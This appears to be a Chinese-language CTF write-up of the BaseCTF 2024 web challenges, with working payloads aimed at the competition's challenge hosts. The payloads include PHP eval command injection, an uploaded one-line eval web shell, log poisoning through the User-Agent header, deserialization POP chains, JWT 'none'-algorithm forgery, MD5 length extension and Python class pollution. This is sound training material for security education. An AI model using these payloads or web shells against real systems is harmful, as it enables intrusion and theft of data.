2024BaseCTF-Web部分题解


A Dark Room

直接查看源代码,注释里有flag

HTTP是什么呀

bp抓包改http参数

POST /?basectf=we1c%2500me  HTTP/1.1
Host: challenge.basectf.fun:33834
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
X-Forwarded-For:127.0.0.1
Referer:Base
User-Agent:Base
Cookie:c00k13=i can't eat it
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 9

Base=fl@g

会得到以下内容,base64解码即可

HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Thu, 15 Aug 2024 07:05:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.4.27
Location: success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==
Content-Length: 0

客户端重定向

  • 服务器在响应中返回一个带有302状态码的响应头,指示浏览器进行跳转。
  • 例如,服务器端脚本通过header("Location: success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==");指令将HTTP响应状态设置为302,然后浏览器会自动访问success.php?flag=QmFzZUNURns1N2Y2MGNlYi00Y2UxLTQ5Y2UtYjNhMC0xMTc3NTliODhkNmZ9Cg==页面。

喵喵喵

<?php
highlight_file(__FILE__);
error_reporting(0);

$a = $_GET['DT'];

eval($a);

?>

get传参给eval执行,直接传system('cat /flag');,即url?DT=system('cat /flag');

EncirclingGame

A simple game, enjoy it and get the flag when you complete it.

纯游戏题,通关得到flag

upload

文件上传漏洞,没有检测文件类型,直接传个木马,然后蚁剑连接

test.php

<?php @eval($_POST['pass']);?>

Aura酱的礼物

data伪协议 ssrf 文件包含

<?php
  highlight_file(__FILE__);
// Aura 酱,欢迎回家~
// 这里有一份礼物,请你签收一下哟~
$pen = $_POST['pen'];
if (file_get_contents($pen) !== 'Aura')
{
  die('这是 Aura 的礼物,你不是 Aura!');
}

// 礼物收到啦,接下来要去博客里面写下感想哦~
$challenge = $_POST['challenge'];
if (strpos($challenge, 'http://jasmineaura.github.io') !== 0)
{
  die('这不是 Aura 的博客!');
}

$blog_content = file_get_contents($challenge);
if (strpos($blog_content, '已经收到Kengwang的礼物啦') === false)
{
  die('请去博客里面写下感想哦~');
}

// 嘿嘿,接下来要拆开礼物啦,悄悄告诉你,礼物在 flag.php 里面哦~
$gift = $_POST['gift'];
include($gift); 

post参数:pen=data://text/plain,Aura&challenge=http://jasmineaura.github.io@challenge.basectf.fun:21758/&gift=php://filter/convert.base64-encode/resource=flag.php

一起吃豆豆

index.js里有一行context.fillText(_LIFE ? atob("QmFzZUNURntKNV9nYW0zXzFzX2Vhc3lfdDBfaDRjayEhfQ==") : 'GAME OVER', this.x, this.y);,base64解码得到flag

你听不到我的声音

系统命令执行,不会直接显示,所以放到其他文件里再访问文件:cmd=cat /flag > ./1.txt

shell_exec($_POST['cmd']);

easy_ser

源码

<?php
highlight_file(__FILE__);
error_reporting(0);

class re{
    public $chu0;
    public function __toString(){
        if(!isset($this->chu0)){
            return "I can not believes!";
        }
        $this->chu0->$nononono;
    }
}

class web {
    public $kw;
    public $dt;

    public function __wakeup() {
        echo "lalalla".$this->kw;
    }

    public function __destruct() {
        echo "ALL Done!";
    }
}

class pwn {
    public $dusk;
    public $over;

    public function __get($name) {
        if($this->dusk != "gods"){
            echo "什么,你竟敢不认可?";
        }
        $this->over->getflag();
    }
}

class Misc {
    public $nothing;
    public $flag;

    public function getflag() {
        eval("system('cat /flag');");
    }
}

class Crypto {
    public function __wakeup() {
        echo "happy happy happy!";
    }

    public function getflag() {
        echo "you are over!";
    }
}
$ser = $_GET['ser'];
unserialize($ser);
?>

exp

<?php

class re{
    public $chu0;
    public function __toString(){
        if(!isset($this->chu0)){
            return "I can not believes!";
        }
        $this->chu0->$nononono;
    }
}

class web {
    public $kw;
    public $dt;

    public function __wakeup() {
        echo "lalalla".$this->kw;
    }

    public function __destruct() {
        echo "ALL Done!";
    }
}

class pwn {
    public $dusk;
    public $over;

    public function __get($name) {
        if($this->dusk != "gods"){
            echo "什么,你竟敢不认可?";
        }
        $this->over->getflag();
    }
}

class Misc {
    public $nothing;
    public $flag;

    public function getflag() {
        echo "getflag";
    }
}

$re = new re();
$pwn = new pwn();
$web = new web();
$misc = new Misc();

$pwn->dusk = "gods";
$pwn->over = $misc;

$re->chu0 = $pwn;
$web->kw = $re;

$res = serialize($web);
echo $res;

最终构造:O:3:"web":2:{s:2:"kw";O:2:"re":1:{s:4:"chu0";O:3:"pwn":2:{s:4:"dusk";s:4:"gods";s:4:"over";O:4:"Misc":2:{s:7:"nothing";N;s:4:"flag";N;}}}s:2:"dt";N;}

RCEisamazingwithspace

绕过空格:cmd=cat${IFS}/flag

Really EZ POP

源码

<?php
  highlight_file(__FILE__);

class Sink
{
  private $cmd = 'echo 123;';
  public function __toString()
  {
    eval($this->cmd);
  }
}

class Shark
{
  private $word = 'Hello, World!';
  public function __invoke()
  {
    echo 'Shark says:' . $this->word;
  }
}

class Sea
{
  public $animal;
  public function __get($name)
  {
    $sea_ani = $this->animal;
    echo 'In a deep deep sea, there is a ' . $sea_ani();
  }
}

class Nature
{
  public $sea;

  public function __destruct()
  {
    echo $this->sea->see;
  }
}

if ($_POST['nature']) {
  $nature = unserialize($_POST['nature']);
}

exp

<?php
class Sink
{
    private $cmd = 'echo 123;';
    public function setPrivateVar($res) {
        $this->cmd = $res;
    }

    public function __toString()
    {
        eval($this->cmd);
    }
}

class Shark
{
    private $word = 'Hello, World!';
    public function setPrivateVar($res) {
        $this->word = $res;
    }
    public function __invoke()
    {
        echo 'Shark says:' . $this->word;
    }
}

class Sea
{
    public $animal;
    public function __get($name)
    {
        $sea_ani = $this->animal;
        echo 'In a deep deep sea, there is a ' . $sea_ani();
    }
}

class Nature
{
    public $sea;

    public function __destruct()
    {
        echo $this->sea->see;
    }
}

$Sink = new Sink();
$Nature = new Nature();
$Sea = new Sea();
$Shark = new Shark();

$Sink->setPrivateVar("system('cat /flag');");
$Nature->sea = $Sea;
$Sea->animal = $Shark;
$Shark->setPrivateVar($Sink);

$res = serialize($Nature);
echo $res;

发过去的序列化内容要在私有类的类名和属性名前加\x00,最终发送nature=O:6:"Nature":1:{s:3:"sea";O:3:"Sea":1:{s:6:"animal";O:5:"Shark":1:{s:11:"%00Shark%00word";O:4:"Sink":1:{s:9:"%00Sink%00cmd";s:20:"system('cat /flag');";}}}}

关于非公有字段名称:

  • private 使用: 私有的类的名称 (考虑到继承的情况) 和字段名组合 \x00类名称\x00字段名
  • protected 使用: * 和字段名组合 \x00*\x00字段名

数学大师

从网页利用正则获取算数式然后post加answer参数发过去,需要开启session cookie

import requests
import re

def extract_and_calculate(expression):
    pattern = r'(\d+)\s*([+\-*/÷×]+)\s*(\d+)'
    match = re.search(pattern, expression)
    if match:
        num1, operator, num2 = match.groups()

        operator = operator.replace('÷', '/').replace('×', '*')

        python_expression = f"{num1} {operator} {num2}"

        try:
            result = eval(python_expression)
            return result
        except Exception as e:
            return f"Error in calculation: {str(e)}"
    else:
        return "No valid expression found."

session = requests.Session()

url = 'http://challenge.basectf.fun:29707'
response = session.get(url).text

for i in range(50):
    res = int(extract_and_calculate(response))

    post_data = {
        'answer': res
    }

    response = session.post(url, data=post_data).text
    print(response)

所以你说你懂md5?

利用hash-ext-attack工具进行哈希长度扩展

python3 hash_ext_attack.py
2024-09-10 20:53:46.493 | DEBUG    | common.md5_manual:__init__:17 - init......
请输入已知明文:
请输入已知hash: 82cb3db8069266aecdc0d3cdabb4b460 
请输入扩展字符: admin
请输入密钥长度:96
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:65 - 已知明文:b''
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:66 - 已知hashb'82cb3db8069266aecdc0d3cdabb4b460'
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:68 - 新明文:b'\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00admin'
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:69 - 新明文(url编码)%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin
2024-09-10 20:53:52.093 | INFO     | common.HashExtAttack:run:71 -hash:e7e7b8375abc6096501a68bbd0e3f662

发送http内容

POST / HTTP/1.1
Host: challenge.basectf.fun:49521
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Cookie:PHPSESSID=1gtcjs8kgqmltafgpn6cncugfv
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 522

apple[]=24&banana[]=2&appple=240610708&bananana=QNKCDZO&banananana=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&apppple=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&name=%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%03%00%00%00%00%00%00admin&md5=e7e7b8375abc6096501a68bbd0e3f662

flag直接读取不就行了?

php原生类的利用

<?php
  highlight_file('index.php');
# 我把flag藏在一个secret文件夹里面了,所以要学会遍历啊~
error_reporting(0);
$J1ng = $_POST['J'];
$Hong = $_POST['H'];
$Keng = $_GET['K'];
$Wang = $_GET['W'];
$dir = new $Keng($Wang);
foreach($dir as $f) {
  echo($f . '<br>');
}
echo new $J1ng($Hong);
?>

访问http://challenge.basectf.fun:27459/?K=DirectoryIterator&W=/,发现根目录下有secret,访问http://challenge.basectf.fun:27459/?K=DirectoryIterator&W=/secret发现f11444g.php,发送post请求

J=SplFileObject&H=/secret/f11444g.php

网页看不到,直接查看源代码

</code>.<br>..<br>f11444g.php<br><?php BaseCTF{640a9b0d-3b98-4d44-8164-a1113b9ec49f} ?>

滤个不停

文件

<?php
  highlight_file(__FILE__);
error_reporting(0);

$incompetent = $_POST['incompetent'];
$Datch = $_POST['Datch'];

if ($incompetent !== 'HelloWorld') {
  die('写出程序员的第一行问候吧!');
}

//这是个什么东东???
$required_chars = ['s', 'e', 'v', 'a', 'n', 'x', 'r', 'o'];
$is_valid = true;

foreach ($required_chars as $char) {
  if (strpos($Datch, $char) === false) {
    $is_valid = false;
    break;
  }
}

if ($is_valid) {

  $invalid_patterns = ['php://', 'http://', 'https://', 'ftp://', 'file://' , 'data://', 'gopher://'];

  foreach ($invalid_patterns as $pattern) {
    if (stripos($Datch, $pattern) !== false) {
      die('此路不通换条路试试?');
    }
  }


  include($Datch);
} else {
  die('文件名不合规 请重试');
}
?>

payload:incompetent=HelloWorld&Datch=/var/log/nginx/access.log,user agent中添加<?php @eval($_POST['pass']);?>

访问/var/log/nginx/access.log发送incompetent=HelloWorld&Datch=/var/log/nginx/access.log&pass=system('cat /flag');

得到

10.32.0.0 - - [13/Sep/2024:00:20:54 +0800] "GET / HTTP/1.1" 502 559 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:55 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:58 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:20:58 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:21:02 +0800] "GET /%3C?php%20phpinfo();?%3E HTTP/1.1" 200 5478 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:21:02 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/%3C?php%20phpinfo();?%3E" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:24:36 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:24:37 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:26:13 +0800] "GET / HTTP/1.1" 200 5472 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27" "-" 10.32.0.0 - - [13/Sep/2024:00:27:12 +0800] "POST / HTTP/1.1" 200 7391 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:13 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:26 +0800] "POST / HTTP/1.1" 200 5467 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:27 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:30 +0800] "POST / HTTP/1.1" 200 8321 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:27:31 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:28:08 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" "-" 10.32.0.0 - - [13/Sep/2024:00:28:32 +0800] "POST / HTTP/1.1" 200 8935 "http://challenge.basectf.fun:30015/" "BaseCTF{a0fd8763-8a3b-4bc5-b430-f09a213482e3} " "-" 10.32.0.0 - - [13/Sep/2024:00:28:33 +0800] "GET /favicon.ico HTTP/1.1" 200 5478 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:30:27 +0800] "POST / HTTP/1.1" 200 9332 "http://challenge.basectf.fun:30015/" "BaseCTF{a0fd8763-8a3b-4bc5-b430-f09a213482e3} " "-" 10.32.0.0 - - [13/Sep/2024:00:30:28 +0800] "GET /favicon.ico HTTP/1.1" 200 5472 "http://challenge.basectf.fun:30015/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" "-" 10.32.0.0 - - [13/Sep/2024:00:30:43 +0800] "GET / HTTP/1.1" 200 5478 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" "-" 10.32.0.0 - - [13/Sep/2024:00:30:46 +0800] "\x16\x03\x01\x00\xD2\x01\x00\x00\xCE\x03\x03\xC25 \xAE\x14'\xE9\x9C\x84\xF1\xB3\xDD\xE3\x09h\x98.\x10\x86\x16\xECn4\x10\xE7\xB3!r\xBA\x1BB\xA2\x00\x00b\xC00\xC0,\xC0/\xC0+\x00\x9F\x00\x9E\xC02\xC0.\xC01\xC0-\x00\xA5\x00\xA1\x00\xA4\x00\xA0\xC0(\xC0$\xC0\x14\xC0" 400 157 "-" "-" "-"

no jwt

源码

from flask import Flask, request, jsonify
import jwt
import datetime
import os
import random
import string

app = Flask(__name__)

# 随机生成 secret_key
app.secret_key = ''.join(random.choices(string.ascii_letters + string.digits, k=16))

# 登录接口
@app.route('/login', methods=['POST'])
def login():
    data = request.json
    username = data.get('username')
    password = data.get('password')

    # 其他用户都给予 user 权限
    token = jwt.encode({
        'sub': username,
        'role': 'user',  # 普通用户角色
        'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)
    }, app.secret_key, algorithm='HS256')
    return jsonify({'token': token}), 200

# flag 接口
@app.route('/flag', methods=['GET'])
def flag():
    token = request.headers.get('Authorization')

    if token:
        try:
            decoded = jwt.decode(token.split(" ")[1], options={"verify_signature": False, "verify_exp": False})
            # 检查用户角色是否为 admin
            if decoded.get('role') == 'admin':
                with open('/flag', 'r') as f:
                    flag_content = f.read()
                return jsonify({'flag': flag_content}), 200
            else:
                return jsonify({'message': 'Access denied: admin only'}), 403

        except FileNotFoundError:
            return jsonify({'message': 'Flag file not found'}), 404
        except jwt.ExpiredSignatureError:
            return jsonify({'message': 'Token has expired'}), 401
        except jwt.InvalidTokenError:
            return jsonify({'message': 'Invalid token'}), 401
    return jsonify({'message': 'Token is missing'}), 401

if __name__ == '__main__':
    app.run(debug=True)

login中发送post数据得到token验证后的jwt格式,把role改成admin

生成jwt token

import jwt  # 导入 PyJWT 包

# payload
token_dict = {
  "sub": "admin",  # 使用 None 而不是 null
  "role": "admin",
}

headers = {
  "alg": "none",
  "typ": "JWT"
}

# 使用 PyJWT 的 encode 方法
jwt_token = jwt.encode(token_dict, "", algorithm="none", headers=headers)

print(jwt_token)

Bearer方案发送认证数据

import requests

# 假设你已经有了一个JWT
jwt_token = 'eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsInJvbGUiOiJhZG1pbiJ9.'

# 目标URL
url = 'http://challenge.basectf.fun:27209/flag'

# 发送GET请求,将JWT放在Authorization头部中
response = requests.get(url, headers={'Authorization': f'Bearer {jwt_token}'})

# 检查响应
if response.status_code == 200:
    print('Success:', response.json())
else:
    print('Error:', response.status_code, response.text)

back to the future

githacker得到git源码直接git show

圣钥之战

提升可以去read那里找一下flag,访问/read拿到源码

from flask import Flask,request
import json

app = Flask(__name__)

def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

def is_json(data):
    try:
        json.loads(data)
        return True
    except ValueError:
        return False

class cls():
    def __init__(self):
        pass

instance = cls()

@app.route('/', methods=['GET', 'POST'])
def hello_world():
    return open('/static/index.html', encoding="utf-8").read()

@app.route('/read', methods=['GET', 'POST'])
def Read():
    file = open(__file__, encoding="utf-8").read()
    return f"J1ngHong说:你想read flag吗?
那么圣钥之光必将阻止你!
但是小小的源码没事,因为你也读不到flag()
{file}
"

@app.route('/pollute', methods=['GET', 'POST'])
def Pollution():
    if request.is_json:
        merge(json.loads(request.data),instance)
    else:
        return "J1ngHong说:钥匙圣洁无暇,无人可以污染!"
    return "J1ngHong说:圣钥暗淡了一点,你居然污染成功了?"

if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80)

python原型链污染__file__flag,发送post数据

{"__init__":{"__globals__":{"__file__":"/flag"}}}

玩原神玩的

源码

<?php
  highlight_file(__FILE__);
error_reporting(0);

include 'flag.php';
if (sizeof($_POST['len']) == sizeof($array)) {
  ys_open($_GET['tip']);
} else {
  die("错了!就你还想玩原神?❌❌❌");
}

function ys_open($tip) {
  if ($tip != "我要玩原神") {
    die("我不管,我要玩原神!😭😭😭");
  }
  dumpFlag();
}

function dumpFlag() {
  if (!isset($_POST['m']) || sizeof($_POST['m']) != 2) {
    die("可恶的QQ人!😡😡😡");
  }
  $a = $_POST['m'][0];
  $b = $_POST['m'][1];
  if(empty($a) || empty($b) || $a != "100%" || $b != "love100%" . md5($a)) {
    die("某站崩了?肯定是某忽悠干的!😡😡😡");
  }
  include 'flag.php';
  $flag[] = array();
  for ($ii = 0;$ii < sizeof($array);$ii++) {
    $flag[$ii] = md5(ord($array[$ii]) ^ $ii);
  }

  echo json_encode($flag);
}

len数组的长度要和array一样,爆破array的长度为45,源码给出了m数组的内容

最后得到flag的数组,每一位进行md5,直接爆破md5

php的数组:len[]=0&len[]=1&len[]=2&len[]=3&len[]=4(拼接

爆破md5

import hashlib

md5_array  = ["3295c76acbf4caaed33c36b1b5fc2cb1","26657d5ff9020d2abefe558796b99584","73278a4a86960eeb576a8fd4c9ec6997","ec8956637a99787bd197eacd77acce5e","e2c420d928d4bf8ce0ff2ec19b371514","43ec517d68b6edd3015b3edc9a11367b","ea5d2f1c4608232e07d3aa3d998e5135","c8ffe9a587b126f152ed3d89a146b445","072b030ba126b2f4b2374f342be9ed44","c9e1074f5b3f9fc8ea15d152add07294","093f65e080a295f8076b1c5722a46aa2","66f041e16a60928b05a7e228a89c3799","9f61408e3afb633e50cdf1b20de6f466","9a1158154dfa42caddbd0694a4e9bdc8","9f61408e3afb633e50cdf1b20de6f466","a684eceee76fc522773286a895bc8436","7f39f8317fbdb1988ef4c628eba02591","eb160de1de89d9058fcb0b968dbbbd68","c45147dee729311ef5b5c3003946c48f","7f6ffaa6bb0b408017b62254211691b5","07e1cd7dca89a1678042477183b7ac3f","9f61408e3afb633e50cdf1b20de6f466","e369853df766fa44e1ed0ff613f563bd","5ef059938ba799aaa845e1c2e8a762bd","a1d0c6e83f027327d8461063f4ac58a6","a1d0c6e83f027327d8461063f4ac58a6","b53b3a3d6ab90ce0268229151c9bde11","a0a080f42e6f13b3a2df133f073095dd","17e62166fc8586dfa4d1bc0e1742c08b","3416a75f4cea9109507cacd8e2f2aefc","a5771bce93e200c36f7cd9dfd0e5deaa","c0c7c76d30bd3dcaefc96f40275bdc0a","a3f390d88e4c41f2747bfa2f1b5f87db","6f4922f45568161a8cdf4ad2299f6d23","98f13708210194c475687be6106a3b84","37693cfc748049e45d87b8c7d8b9aacd","7cbbc409ec990f19c78c75bd1e06f215","1f0e3dad99908345f7439f8ffabdffc4","34173cb38f07f89ddbebc2ac9128303f","70efdf2ec9b086079795c442636b55fb","35f4a8d465e6e1edc05f3d8ab658c551","02e74f10e0327ad868d138f2b4fdd6f0","d1fe173d08e959397adf34b1d77e88d7","1f0e3dad99908345f7439f8ffabdffc4","43ec517d68b6edd3015b3edc9a11367b"]

flag = ''

for index, i in enumerate(md5_array):
    for j in range(256):
        if hashlib.md5(str(j ^ index).encode()).hexdigest() == i:
            flag += chr(j)

print(flag)

ez_php_jail

源码

<?php
highlight_file(__FILE__);
error_reporting(0);
include("hint.html");
$Jail = $_GET['Jail_by.Happy'];

if($Jail == null) die("Do You Like My Jail?");

function Like_Jail($var) {
    if (preg_match('/(`|\$|a|c|s|require|include)/i', $var)) {
        return false;
    }
    return true;
}

if (Like_Jail($Jail)) {
    eval($Jail);
    echo "Yes! you escaped from the jail! LOL!";
} else {
    echo "You will Jail in your life!";
}
echo "\n";

// 在HTML解析后再输出PHP源代码

?>

执行hightlight_file利用glob进行通配符查找


  目录